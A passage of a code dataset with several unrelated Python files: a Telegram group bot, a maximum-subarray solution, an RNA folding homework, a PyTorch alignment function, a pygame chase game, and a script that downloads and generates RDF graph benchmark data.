protecao_spam_do_grupo(message):\n return\n bot_responda(message, LISTA_DE_ESTADOS)\n\n\n@bot.message_handler(commands=['whoami'])\ndef send_whoami(message):\n if protecao_spam_do_grupo(message):\n return\n bot_responda(message, WHOAMI.format(message.from_user))\n\n\n@bot.message_handler(commands=['lista'])\ndef send_lista(message):\n bot_responda(message, db.lista_users())\n\n\n@bot.message_handler(commands=['nomes', 'membros'])\ndef send_nomes(message):\n if protecao_spam_do_grupo(message):\n return\n bot_responda(message, db.lista_users_por_nome())\n\n\n@bot.message_handler(commands=['estatistica', 'contador', 'total', 'stat', 'stats'])\ndef send_stats(message):\n if protecao_spam_do_grupo(message):\n return\n stats = db.get_stats()\n estatistica = STAT_CAB\n for estado in stats[0]:\n estatistica += STAT_ESTADO.format(estado)\n estatistica += STAT_ROD.format(stats[1])\n bot_responda(message, estatistica)\n\n\n@bot.message_handler(commands=['eventos'])\ndef send_eventos(message):\n if protecao_spam_do_grupo(message):\n return\n eventos = db.get_eventos()\n mensagem = EVENTOS_CAB\n for evento in eventos:\n base = pytz.utc.localize(evento[1])\n m = manaus.normalize(base)\n b = belem.normalize(base)\n r = rio_branco.normalize(base)\n mensagem += EVENTOS_DESC.format(evento, r, m, b)\n mensagem += EVENTOS_ROD\n bot_responda(message, mensagem)\n\n\n@bot.message_handler(commands=['membro', 'mecadastra', 'novo'])\ndef send_membro(message):\n if protecao_spam_do_grupo(message):\n return\n params = extract_arguments(message.text)\n if not params:\n bot_responda(message, MEMBRO_AJUDA)\n return\n estado = params.lower().strip()\n\n db_estado = db.get_estado(estado)\n if db_estado:\n db.update_user(message.from_user, db_estado)\n bot_responda(message, MEMBRO_RESULTADO.format(message.from_user, estado.title()))\n else:\n bot_responda(message, MEMBRO_ESTADO.format(message.chat, estado))\n\n if not message.from_user.last_name:\n bot_responda(message, TELEGRAM_ULTIMO_NOME_AJUDA)\n\n if not message.from_user.username:\n bot_responda(message, TELEGRAM_NOME_USUARIO_AJUDA)\n\n@bot.message_handler(commands=['hora', 'horas', 'agora', 'now'])\ndef send_hora(message):\n if protecao_spam_do_grupo(message):\n return\n agora = datetime.utcnow().replace(tzinfo=pytz.utc)\n horarios = {\n \"manaus\": manaus.normalize(agora),\n \"belem\": belem.normalize(agora),\n \"riobranco\": rio_branco.normalize(agora),\n \"palmas\": palmas.normalize(agora),\n \"bruxelas\": bruxelas.normalize(agora)\n }\n bot_responda(message, HORA.format(**horarios))\n\nif __name__ == '__main__':\n _logger = telebot.logger\n telebot.logger.setLevel(logging.DEBUG)\n bot.polling(none_stop=True)\n \n \n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":5281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"63551128","text":"import sys\n#from sys import maxsize\n'''\ndef max_subsequence_sum(numbers, size):\n max_so_far = -maxsize-1\n max_ending_here = 0\n\n for i in range(size):\n max_ending_here = max_ending_here + numbers[i]\n if max_so_far < max_ending_here:\n max_so_far = max_ending_here\n if max_ending_here < 0:\n max_ending_here = 0\n return max_so_far\n'''\n#dynamic programming\ndef max_subsequence_sum(numbers, size):\n max_so_far =numbers[0] \n curr_max = numbers[0] \n \n for i in range(1,size): \n curr_max = max(numbers[i], curr_max + numbers[i]) \n max_so_far = max(max_so_far,curr_max) \n \n return max_so_far \n\ndef main():\n numbers = 
sys.stdin.readline().strip('\\n').split()\n numbers = list(map(int,numbers))\n\n result = max_subsequence_sum(numbers, len(numbers))\n print(result)\n \nmain()","sub_path":"2ºAno/2ºSemestre/LA2/progDinamica/somaMaxima.py","file_name":"somaMaxima.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"16771026","text":"from energyD import *\nimport sys\n\n# Based on Zuker and Stiegler 1981: \"Optimal computer folding of large\n# RNA sequences using thermodynamics and auxiliary information\".\n# Charge 0 for bifurcation loops and all unpaired bases which aren't\n# part of loops.\n\nMINPAIRDIST=5\n\ndef efold(RNA, efD, fpD):\n '''RNA folding minimizing energy; recursive'''\n if len(RNA) < MINPAIRDIST + 1:\n return (float('inf'), [])\n if RNA in efD:\n return efD[RNA]\n else:\n # lose it case\n loseIt = efold(RNA[1:], efD, fpD)\n bestSoFar = (loseIt[0], adjust(loseIt[1], 1))\n # use it case\n for i in range(MINPAIRDIST, len(RNA)):\n if isComplement(RNA[0], RNA[i]):\n inside = fpfold(RNA[:i+1], fpD)\n rest = efold(RNA[i+1:], efD, fpD)\n if inside[0] == float('inf'):\n score = rest[0]\n elif rest[0] == float('inf'):\n score = inside[0]\n else:\n score = inside[0] + rest[0]\n if score < bestSoFar[0]:\n matches = inside[1]\n matches.extend(adjust(rest[1], i+1))\n bestSoFar = (score, matches)\n efD[RNA] = bestSoFar\n return bestSoFar\n\ndef isComplement(RNA1, RNA2):\n '''Boolean for whether or not the input bases are complementary.'''\n if RNA1 == RNA2:\n return False\n if RNA1 == 'A' and RNA2 == 'U':\n return True\n if RNA1 == 'U' and RNA2 == 'A':\n return True\n if RNA1 == 'C' and RNA2 == 'G':\n return True\n if RNA1 == 'G' and RNA2 == 'C':\n return True\n # else\n return False\n\ndef fpfold(RNA,fpD):\n '''Helper function for efold which tries to force the outer-most bases\n to pair. Assign infinite energy if not possible.'''\n if len(RNA) < MINPAIRDIST+1:\n return (float('inf'), [])\n if RNA in fpD:\n return fpD[RNA]\n else:\n bestSoFar = (hairpin(RNA), [(0, len(RNA)-1)])\n mySBI = sbiLoop(RNA, fpD)\n if mySBI[0] < bestSoFar[0]:\n bestSoFar = mySBI\n myBI = biloop(RNA, fpD)\n if myBI[0] < bestSoFar[0]:\n bestSoFar = myBI\n fpD[RNA] = bestSoFar\n return bestSoFar\n\ndef hairpin(RNA):\n '''Returns score of hairpin formed by given RNA. 
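`max_subsequence_sum` above is Kadane's algorithm: `curr_max` is the best sum of a subarray ending at index i, and `max_so_far` tracks the best seen anywhere. A quick check with the classic example, using the function defined in the script above:

```python
numbers = [-2, 1, -3, 4, -1, 2, 1, -5, 4]
# curr_max per index: -2, 1, -2, 4, 3, 5, 6, 1, 5 -> the answer is 6,
# achieved by the subarray [4, -1, 2, 1].
assert max_subsequence_sum(numbers, len(numbers)) == 6
```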
Does not call fpfold.'''\n if len(RNA) < MINPAIRDIST + 1:\n return float('inf')\n # start string to look up energy\n if RNA[0] == 'A' or RNA[0] == 'U':\n myStr = 'hairpinA'\n else:\n myStr = 'hairpinG'\n # finish string to look up energy\n if len(RNA) - 2 < 30:\n myStr += str(len(RNA) - 2)\n else:\n myStr += '30+'\n return energyD[myStr]\n\ndef sbiLoop(RNA,fpD):\n '''Returns best energy score and corresponding matches after testing\n stacking faces, bulge loop faces, and interior loop faces.'''\n if len(RNA) < MINPAIRDIST + 1:\n return (float('inf'), [])\n if RNA in fpD:\n return fpD[RNA]\n else:\n bestSoFar = (float('inf'), [])\n # STACKING FACE\n if isComplement(RNA[1], RNA[-2]):\n stackStr = RNA[0] + RNA[-1] + RNA[1] + RNA[-2]\n stackScore = energyD[stackStr]\n stackRecursion = fpfold(RNA[1:-1], fpD)\n stackRecursion = (stackRecursion[0], adjust(stackRecursion[1],1))\n if stackRecursion[0] != float('inf'):\n stackScore += stackRecursion[0]\n if stackScore < bestSoFar[0]:\n bestSoFar = (stackScore, list(set([(0, len(RNA)-1)] + stackRecursion[1] + [(1, len(RNA)-2)])))\n\n # BULGE LOOP FACE\n\n # start on second base\n for i in range(MINPAIRDIST+1, len(RNA)-2):\n if isComplement(RNA[1], RNA[i]):\n numUnpaired = len(RNA)-i-2\n if numUnpaired < 30:\n unpairedStr = 'bulge' + str(numUnpaired)\n else:\n unpairedStr = 'bulge' + '30+'\n bulgeStr = RNA[0] + RNA[-1] + RNA[1] + RNA[i]\n bulgeRecursion = fpfold(RNA[2:i+1], fpD)\n bulgeRecursion = (bulgeRecursion[0], adjust(bulgeRecursion[1],2))\n if bulgeRecursion[0] != float('inf'):\n bulgeScore = energyD[unpairedStr] + energyD[bulgeStr] + bulgeRecursion[0]\n else:\n bulgeScore = energyD[unpairedStr] + energyD[bulgeStr]\n\n if bulgeScore < bestSoFar[0]:\n bestSoFar = (bulgeScore, list(set([(0, len(RNA)-1)] + bulgeRecursion[1] + [(1, i)])))\n\n # end on second-to-last base\n for j in range(2, len(RNA)-1-MINPAIRDIST):\n if isComplement(RNA[j], RNA[-2]):\n numUnpaired = j-1\n if numUnpaired < 30:\n unpairedStr = 'bulge' + str(numUnpaired)\n else:\n unpairedStr = 'bulge' + '30+'\n bulgeStr = RNA[0] + RNA[-1] + RNA[j] + RNA[-2]\n bulgeRecursion = fpfold(RNA[j:len(RNA)-1], fpD)\n bulgeRecursion = (bulgeRecursion[0], adjust(bulgeRecursion[1],j))\n if bulgeRecursion[0] != float('inf'):\n bulgeScore = energyD[unpairedStr] + energyD[bulgeStr] + bulgeRecursion[0]\n else:\n bulgeScore = energyD[unpairedStr] + energyD[bulgeStr]\n\n if bulgeScore < bestSoFar[0]:\n bestSoFar = (bulgeScore, list(set([(0, len(RNA)-1)] + bulgeRecursion[1] + [(j, len(RNA)-2)])))\n\n # INTERIOR LOOP FACE\n for k in range(2,len(RNA)-MINPAIRDIST-2):\n for l in range(k+MINPAIRDIST, len(RNA)-2):\n if isComplement(RNA[k], RNA[l]):\n # start string to look up energy\n if RNA[0] == 'A' or RNA[0] == 'U':\n interiorStr = 'interiorA'\n else:\n interiorStr = 'interiorG'\n # Add second pair\n if RNA[k] == 'G' or RNA[k] == 'C':\n interiorStr += 'G'\n else:\n interiorStr += 'A'\n if interiorStr == 'interiorAG':\n interiorStr = 'interiorGA'\n # Add number of unpaired bases\n numUnpaired = (len(RNA)-2-l) + (k-1)\n if numUnpaired < 30:\n interiorStr += str(numUnpaired)\n else:\n interiorStr += '30+'\n\n interiorScore = energyD[interiorStr]\n interiorRecursion = fpfold(RNA[k:l+1], fpD)\n interiorRecursion = (interiorRecursion[0], adjust(interiorRecursion[1],k))\n if interiorRecursion[0] != float('inf'):\n interiorScore += interiorRecursion[0]\n\n if interiorScore < bestSoFar[0]:\n bestSoFar = (interiorScore, list(set([(0, len(RNA)-1)] + interiorRecursion[1] + [(k,l)])))\n fpD[RNA] = bestSoFar\n return 
bestSoFar\n\ndef biloop(RNA, fpD):\n ''' '''\n if len(RNA) < (2*MINPAIRDIST) + 4:\n return (float('inf'), [])\n if RNA in fpD:\n return fpD[RNA]\n else:\n bestSoFar = (float('inf'), [])\n # i: Loop through where the first loop can start\n for i in range(1, len(RNA)-(2*MINPAIRDIST)-2):\n # j: Loop through where the first loop can end\n for j in range(i+MINPAIRDIST, len(RNA)-MINPAIRDIST-2):\n if isComplement(RNA[i], RNA[j]):\n firstLoop = fpfold(RNA[i:j+1], fpD)\n firstLoop = (firstLoop[0], adjust(firstLoop[1],i))\n # k: Loop through where the second loop can start\n for k in range(j+1, len(RNA)-MINPAIRDIST-1):\n # l: Loop through where the second loop can end\n for l in range(k+MINPAIRDIST, len(RNA)-1):\n if isComplement(RNA[k],RNA[l]):\n secondLoop = fpfold(RNA[k:l+1], fpD)\n secondLoop = (secondLoop[0], adjust(secondLoop[1],k))\n thisScore = firstLoop[0] + secondLoop[0]\n if thisScore < bestSoFar[0]:\n bestSoFar = (thisScore, list(set(firstLoop[1]+secondLoop[1])))\n fpD[RNA] = bestSoFar\n return bestSoFar\n\ndef toVienna(RNA,sol):\n '''Convert efold output to the string format used by Vienna\n RNAplot.'''\n outL=[\".\"]*len(RNA)\n for pair in sol[1]:\n outL[pair[0]]='('\n outL[pair[1]]=')'\n return \"\".join(outL)\n\ndef adjust(pairsL, k):\n '''Add k to the coordinates in pairsL, returning a new list.'''\n newPairsL=[]\n for l,r in pairsL:\n newPairsL.append((l+k,r+k))\n return newPairsL\n\ndef energyFold(RNA):\n '''Wrapper to run energy based RNA folding.'''\n sol = efold(RNA,{},{})\n print(sol)\n print(RNA)\n print(toVienna(RNA,sol))\n","sub_path":"Fall2018/Bio188/hw8/hw1.py","file_name":"hw1.py","file_ext":"py","file_size_in_byte":9019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"484771433","text":"import re\nimport torch\nfrom torch.autograd import Function\nfrom .utils import FunctionBackend\nfrom .._ext import liborn\n\n\nclass ORAlign1d(Function):\n\n def __init__(self, nOrientation, return_direction=False):\n super(ORAlign1d, self).__init__()\n self.backend = FunctionBackend(liborn)\n self.nOrientation = nOrientation\n self.return_direction = return_direction\n\n def forward(self, input):\n mainDirection, output = input.new().byte(), input.new()\n self.backend.set_type(input.type())\n self.backend.RIE_AlignFeature(\n input, \n mainDirection, \n output, \n self.nOrientation)\n\n if self.return_direction:\n self.save_for_backward(input, mainDirection)\n self.mark_non_differentiable(mainDirection)\n return output, mainDirection\n else:\n self.save_for_backward(input)\n self.mainDirection = mainDirection\n return output\n\n def backward(self, grad_output):\n if self.return_direction:\n input, mainDirection = self.saved_tensors\n else:\n input, = self.saved_tensors\n mainDirection = self.mainDirection\n\n grad_input = input.new()\n self.backend.RIE_UnAlignFeature(\n grad_input, \n mainDirection, \n grad_output, \n self.nOrientation)\n return grad_input","sub_path":"install/orn/functions/RIE.py","file_name":"RIE.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"267134178","text":"import pygame\r\nimport random\r\nfrom Leikir import Messages, GamePlay\r\n\r\n\r\n#TODO/hugmyndir ?\r\n#(1) Bua til Mapp fyrir bakgrunninn i eltingaleiknum, eh cool byggt a muminheiminum.\r\n\r\n#(2) Baeta virknina sem akvardar hvort leikamdur nadi gullpening eda hvort morrinn nadi leikmanninum svo hun se nakvaemari.\r\n\r\n#(3) Lata leikmanninn komast 
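`toVienna` renders an `efold` solution as dot-bracket notation, and `adjust` shifts pair coordinates when a subproblem's pairs are spliced into a larger sequence. A small illustration with a hand-made pair list (not an actual `efold` output):

```python
sol = (0.0, [(0, 9), (1, 8)])        # two nested pairs on a 10-base strand
print(toVienna("GCAUCUAUGC", sol))   # -> ((......))

print(adjust([(0, 9), (1, 8)], 3))   # -> [(3, 12), (4, 11)]
```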
a akvedinn stad eftir ad hann nadi gullpeningunum 10.\r\n\r\n#(4) Taka fram i leidbeiningum ad haegt se ad yta a P til ad fara i pasu\r\n\r\n#(5) Breyta thannig ad leikmadur komist ekki ut fyrir bordid nema a akvednum stodum, og komi tha ut aftur annarsstadar?\r\n\r\n#(6) Laga galla thegar leikmadur fer ut fyrir bordid og velur ad halda afram ad spila.\r\n\r\n\r\n\r\n\r\nclass Morrinn(Messages, GamePlay):\r\n \r\n leikm_x = 500\r\n leikm_y = 400\r\n stig = -1\r\n\r\n pygame.display.set_caption('Morrinn')\r\n image = pygame.image.load('morrinn.png')\r\n image2 = pygame.image.load('snudur.png')\r\n image3 = pygame.image.load('gullpeningur.png')\r\n \r\n\r\n def __init__(self):\r\n pass\r\n\r\n\r\n #Upphafsskjar\r\n def gameIntro(self):\r\n \r\n intro = True\r\n while intro:\r\n \r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_s:\r\n intro = False\r\n if event.key == pygame.K_h:\r\n pygame.quit()\r\n quit()\r\n \r\n self.gameDisplay.fill(self.white)\r\n self.screenMessage(\"Velkominn i bord 4\", self.black, -150, size = \"large\" ) \r\n self.screenMessage(\"Markmid leiksins er ad safna 10 gullpeningum og fordast morrann\", self.black, -70)\r\n self.screenMessage(\"Ef thu ferd ut fyrir rammann deyrdu\", self.black, -40)\r\n self.screenMessage(\"Yttu a S til ad spila eda H til ad haetta\", self.red, 20)\r\n \r\n \r\n pygame.display.update()\r\n self.clock.tick(15)\r\n #Birtir fjolda gullpeninga sem hefur verdi safnad\r\n def gameScore(self):\r\n text = self.small.render(\"Gullpeningar: \" + str(self.stig), True, self.black)\r\n self.gameDisplay.blit(text, [0,0])\r\n\r\n\r\n def gamePause(self):\r\n \r\n paused = True\r\n \r\n self.screenMessage(\"Pasa\", self.black, -100, size = \"large\")\r\n self.screenMessage(\"Yttu a A til ad halda afram eda H til ad haetta\", self.black, 25)\r\n pygame.display.update()\r\n \r\n \r\n while paused:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n \r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_a:\r\n paused = False\r\n elif event.key == pygame.K_h:\r\n pygame.quit()\r\n quit() \r\n self.clock.tick(5)\r\n \r\n #Skilar hnitum fyrir gullpening med slembinni stadsetningu\r\n def coinGenerator(self):\r\n self.stig += 1\r\n coin_x = random.randrange(0, self.display_width - 20)\r\n coin_y = random.randrange(0, self.display_height - 20) \r\n return coin_x, coin_y\r\n \r\n #Flaedi leiksins\r\n def gameLoop(self):\r\n gameExit = False\r\n gameOver = False\r\n gameWin = False\r\n\r\n morri_x = 0\r\n morri_y = 0\r\n delta_y = 0\r\n delta_x = 0\r\n \r\n CoinX, CoinY = self.coinGenerator()\r\n \r\n while not gameExit:\r\n \r\n #Thegar leikmadur hefur unnid!\r\n if gameWin == True:\r\n self.stig = -1\r\n self.gameDisplay.fill(self.white) \r\n self.screenMessage(\"THU VANNST!!\", self.red, -50, size = \"large\")\r\n self.screenMessage(\"S til ad spila aftur eda H til ad haetta\", self.black, 50, size = \"small\")\r\n pygame.display.update()\r\n \r\n while gameWin == True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n gameExit = True\r\n gameWin = False\r\n \r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_h:\r\n gameExit = True\r\n gameWin = False\r\n if event.key == pygame.K_s:\r\n self.gameLoop()\r\n \r\n #Thegar leikmadur tapar!\r\n if gameOver == True:\r\n self.stig = -1\r\n self.screenMessage(\"Thu tapadir!!\", self.red, -50, size = 
\"large\")\r\n self.screenMessage(\"S til ad spila aftur eda H til ad haetta\", self.black, 50, size = \"small\")\r\n pygame.display.update()\r\n \r\n while gameOver == True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n gameExit = True\r\n gameOver = False\r\n \r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_h:\r\n gameExit = True\r\n gameOver = False\r\n if event.key == pygame.K_s:\r\n self.gameLoop()\r\n \r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n gameExit = True\r\n \r\n #Hreyfing i hnitum leikmanns\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT:\r\n delta_x = -10\r\n elif event.key == pygame.K_RIGHT:\r\n delta_x = 10\r\n elif event.key == pygame.K_UP:\r\n delta_y = -10\r\n elif event.key == pygame.K_DOWN:\r\n delta_y = 10\r\n \r\n \r\n #PASA, baeta inn leidbeiningum a upphafsskja ad leikmadur geti valid pasu.\r\n elif event.key == pygame.K_p:\r\n self.gamePause()\r\n \r\n \r\n if event.type == pygame.KEYUP:\r\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\r\n delta_x = 0 \r\n if event.key == pygame.K_UP or event.key == pygame.K_DOWN:\r\n delta_y = 0 \r\n \r\n \r\n self.leikm_x += delta_x\r\n self.leikm_y += delta_y\r\n \r\n # Lata morrann elta leikmann\r\n if self.leikm_x < morri_x:\r\n morri_x -= 5\r\n elif self.leikm_x > morri_x:\r\n morri_x += 5 \r\n if self.leikm_y < morri_y:\r\n morri_y -= 5\r\n elif self.leikm_y > morri_y:\r\n morri_y += 5\r\n \r\n \r\n \r\n self.gameDisplay.fill(self.white) \r\n self.gameDisplay.blit(self.image3, [CoinX, CoinY, 20, 20])\r\n self.gameDisplay.blit(self.image2, [self.leikm_x,self.leikm_y, 30, 30] )\r\n self.gameDisplay.blit(self.image, [morri_x, morri_y, 30, 30] )\r\n self.gameScore()\r\n pygame.display.update()\r\n \r\n \r\n #Nadi leikmadur Pjening eda nadi Morrinn leikmanni?\r\n #Tharf ad eiga toluvert vid thetta \r\n if abs(self.leikm_x - CoinX) < 15 and abs(self.leikm_y - CoinY) < 15:\r\n CoinX, CoinY = self.coinGenerator()\r\n \r\n if abs(self.leikm_x - morri_x) < 25 and abs(self.leikm_y - morri_y) < 25:\r\n gameOver = True\r\n if self.leikm_x >= self.display_width or self.leikm_x < 0 or self.leikm_y >= self.display_height or self.leikm_y < 0:\r\n gameOver = True \r\n \r\n if self.stig == 10:\r\n gameWin = True\r\n \r\n self.clock.tick(20)\r\n \r\n pygame.quit()\r\n quit()\r\n\r\n\r\nLeikur4 = Morrinn()\r\nLeikur4.gameIntro() \r\nLeikur4.gameLoop()\r\n","sub_path":"Múmínálfarnir/Morrinn.py","file_name":"Morrinn.py","file_ext":"py","file_size_in_byte":8581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"579053568","text":"import lzma\nimport tarfile\nimport os\nimport subprocess\nimport shutil\nimport urllib.request\nimport requests\nimport numpy as np\nfrom rdflib import Graph, URIRef, BNode\n\nfrom contextlib import closing\n\nGT_GRAPH_URL = 'http://www.cse.psu.edu/~kxm85/software/GTgraph/GTgraph.tar.gz'\nGT_GRAPH_ARCH = './tools/GTgraph.tar.gz'\n\nMEMORY_ALIASES_DOWNLOAD_ID = '1fVMY1rE7vX-bFWdP3CDTdjILDsELOXK0'\nRDF_DOWNLOAD_ID = '1ahY5P4UkJ9Fpg9EN6iT2_GQNsztTI2K3'\n\nSPARSE_GRAPH_TO_GEN = [[5000, 0.001], [10000, 0.001], [10000, 0.01], [10000, 0.1], [20000, 0.001], [40000, 0.001], [80000, 0.001]]\nFULL_GRAPH_TO_GEN = [10, 50, 100, 200, 500, 1000, 2000, 5000, 10000, 25000, 50000, 80000]\nNUMBER_OF_WORST_CASES = 12\nURI_PREFIX = 'http://example.org/'\n\nRDF = 'RDF'\nMEMORY_ALIASES = 'MemoryAliases'\nDATA_ROOT_DIR = './data/graphs/'\nMATRICES_DIR = 
'Matrices'\nDATA_TO_UNPACK = [[MEMORY_ALIASES,MEMORY_ALIASES_DOWNLOAD_ID], [RDF,RDF_DOWNLOAD_ID]]\nGT_GRAPH = './tools/GTgraph/random/GTgraph-random'\nTMP_FILE = 'tmp.txt'\n\ndef download_file_from_google_drive(id, destination):\n URL = \"https://docs.google.com/uc?export=download\"\n\n session = requests.Session()\n\n response = session.get(URL, params = { 'id' : id }, stream = True)\n token = get_confirm_token(response)\n\n if token:\n params = { 'id' : id, 'confirm' : token }\n response = session.get(URL, params = params, stream = True)\n\n save_response_content(response, destination) \n\ndef get_confirm_token(response):\n for key, value in response.cookies.items():\n if key.startswith('download_warning'):\n return value\n\n return None\n\ndef save_response_content(response, destination):\n CHUNK_SIZE = 32768\n\n with open(destination, \"wb\") as f:\n for chunk in response.iter_content(CHUNK_SIZE):\n if chunk: # filter out keep-alive new chunks\n f.write(chunk)\n\ndef download_data():\n print('Downloading from GDrive is started.')\n for f in DATA_TO_UNPACK: \n dst = os.path.join(os.path.join(DATA_ROOT_DIR,f[0]),os.path.join(MATRICES_DIR + '.tar.xz'))\n print('Download archive to ' + dst)\n download_file_from_google_drive(f[1], dst) \n print('Downloading from GDrive is finished.')\n \ndef unpack(file_from, path_to):\n with lzma.open(file_from) as f:\n with tarfile.open(fileobj=f) as tar:\n content = tar.extractall(path_to)\n\ndef install_gtgraph():\n print('Installation of GTgraph is started.')\n with urllib.request.urlopen(GT_GRAPH_URL) as response, open(GT_GRAPH_ARCH, 'wb') as out_file:\n shutil.copyfileobj(response, out_file)\n print('GTgraph is downloaded.')\n tar = tarfile.open(GT_GRAPH_ARCH)\n tar.extractall('./tools')\n tar.close()\n\n subprocess.run(['sed', '-i', 's/CC = icc/#CC = icc/g', './tools/GTgraph/Makefile.var'])\n subprocess.run(['sed', '-i', 's/#CC = gcc/CC = gcc/g', './tools/GTgraph/Makefile.var'])\n subprocess.run(['make', '-C', './tools/GTgraph']) \n print('Installation of GTgraph is finished.') \n\ndef unpack_graphs():\n for d in DATA_TO_UNPACK:\n to = os.path.join(DATA_ROOT_DIR, d[0])\n arch = os.path.join(to, '%s.tar.xz'%(MATRICES_DIR))\n print ('Unpack ', arch, ' to ', to)\n unpack(arch, to)\n\n# RDF serialization\ndef write_to_rdf(target, graph):\n graph.serialize(target + '.xml', format='xml')\n\ndef add_rdf_edge(subj, pred, obj, graph):\n s = BNode('id-%s'%(subj))\n p = URIRef(URI_PREFIX + pred)\n o = BNode('id-%s'%(obj))\n graph.add((s, p, o))\n\ndef gen_sparse_graph(target_dir, vertices, prob):\n \n subprocess.run([GT_GRAPH, '-t', '0', '-n', '%s'%(vertices), '-p', '%s'%(prob), '-o', TMP_FILE])\n\n with open(TMP_FILE) as in_file:\n output_graph = Graph()\n target = os.path.join(target_dir, 'G%sk-%s'%(int(vertices/1000), prob))\n for l in in_file.readlines():\n if l.startswith('a '):\n a = l.split(' ')\n lbl = 'A' if int(a[3]) % 2 == 0 else 'AR'\n add_rdf_edge(a[1], lbl, a[2], output_graph)\n write_to_rdf(target, output_graph)\n\ndef gen_worst_case_graph(target_dir, vertices):\n first_cycle = int(vertices / 2) + 1\n output_graph = Graph()\n target = os.path.join(target_dir, 'worstcase_%s'%(vertices))\n \n for i in range(0, first_cycle - 1):\n add_rdf_edge(i, 'A', i + 1, output_graph)\n\n add_rdf_edge(first_cycle - 1, 'A', 0, output_graph) \n add_rdf_edge(first_cycle - 1, 'B', first_cycle, output_graph)\n for i in range(first_cycle, vertices - 1):\n add_rdf_edge(i, 'B', i + 1, output_graph)\n\n add_rdf_edge(vertices - 1, 'B', first_cycle - 1, output_graph)\n\n 
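`add_rdf_edge` above encodes a labeled edge as an rdflib triple: blank nodes (`id-<vertex>`) for the endpoints and a URI under `URI_PREFIX` for the label. The same encoding standalone:

```python
from rdflib import Graph, URIRef, BNode

g = Graph()
g.add((BNode("id-0"), URIRef("http://example.org/A"), BNode("id-1")))
g.add((BNode("id-1"), URIRef("http://example.org/A"), BNode("id-0")))
print(g.serialize(format="xml"))  # returns a str in rdflib 6+
```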
write_to_rdf(target, output_graph)\n\ndef gen_cycle_graph(target_dir, vertices):\n output_graph = Graph()\n target = os.path.join(target_dir, 'fullgraph_%s'%(vertices))\n\n for i in range(0, vertices - 1):\n add_rdf_edge(i, 'A', i + 1, output_graph)\n add_rdf_edge(vertices - 1, 'A', 0, output_graph)\n\n write_to_rdf(target, output_graph)\n\ndef gen_scale_free_graph(target_dir, n, k, labels):\n g = {\n i: [(j, np.random.choice(labels))\n for j in range(k)] for i in range(k)\n }\n degree = [3] * k\n\n for i in range(k, n):\n to_vertices = np.random.choice(range(i), size=k, replace=False, p=np.array(degree) / sum(degree))\n\n g[i] = []\n degree.append(0)\n for to in to_vertices:\n label = np.random.choice(labels)\n g[i].append((to, label))\n degree[to] += 1\n degree[i] += 1\n g[to].append((i, label))\n \n output_graph = Graph()\n target = os.path.join(target_dir, 'scale_free_graph_%s_%s')%(n, k)\n for v in g:\n for to in g[v]:\n add_rdf_edge(v, to[1], to[0], output_graph)\n \n write_to_rdf(target, output_graph)\n\ndef clean_dir(path):\n if os.path.isdir(path): \n shutil.rmtree(path)\n os.mkdir(path)\n\ndef generate_all_sparse_graphs():\n print('Sparse graphs generation is started.') \n\n matrices_dir = os.path.join(os.path.join(DATA_ROOT_DIR, 'SparseGraph'), MATRICES_DIR)\n clean_dir(matrices_dir)\n\n for g in SPARSE_GRAPH_TO_GEN: gen_sparse_graph(matrices_dir, g[0], g[1])\n print('Sparse graphs generation is finished.')\n\ndef generate_full_graphs():\n print('Full graphs generation is started.')\n matrices_dir = os.path.join(os.path.join(DATA_ROOT_DIR, 'FullGraph'), MATRICES_DIR)\n clean_dir(matrices_dir)\n \n for g in FULL_GRAPH_TO_GEN: gen_cycle_graph(matrices_dir, g)\n print('Full graphs generation is finished.')\n\ndef generate_worst_case_graphs():\n print('Worst case graphs generation is started.')\n matrices_dir = os.path.join(os.path.join(DATA_ROOT_DIR, 'WorstCase'), MATRICES_DIR)\n clean_dir(matrices_dir)\n \n for n in range(2, NUMBER_OF_WORST_CASES): gen_worst_case_graph(matrices_dir, 2 ** n)\n print('Worst case graphs generation is finished.')\n\ndef generate_scale_free_graphs():\n print('Scale free graphs generation is started.')\n matrices_dir = os.path.join(DATA_ROOT_DIR, 'ScaleFree', MATRICES_DIR)\n clean_dir(matrices_dir)\n\n for k in 1, 3, 5, 10:\n for n in 100, 500, 2500, 10000:\n gen_scale_free_graph(matrices_dir, n, k, ['a', 'b', 'c', 'd'])\n print('Scale free graphs generation is finished.')\n\ndef gen_sierpinski_graph(target_dir, degree, predicates=['A']):\n \"\"\" Generates a Sierpinski Triangle graph. \"\"\"\n \n def sierpinski(t, l, r, deg, preds, g):\n ''' Core function for generating the Sierpinski Triangle. '''\n if deg > 0:\n lt = next(ids)\n tr = next(ids)\n rl = next(ids)\n sierpinski(l, lt, rl, deg-1, preds, g)\n sierpinski(lt, t, tr, deg-1, preds, g)\n sierpinski(rl, tr, r, deg-1, preds, g)\n else:\n add_edges(l,t,preds,g)\n add_edges(t,r,preds,g)\n add_edges(r,l,preds,g)\n \n def add_edges(u,v,preds,g):\n ''' Adds edges between vertices u and v for all predicates. '''\n for p in preds:\n g += [[u,p,v]]\n g += [[v,p,u]]\n \n def _idgen():\n ''' Generates integer identifiers for vertices. 
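`gen_scale_free_graph` grows the graph by preferential attachment: each new vertex picks k distinct existing neighbors with probability proportional to their current degree, which is what produces the scale-free degree distribution. The selection step in isolation:

```python
import numpy as np

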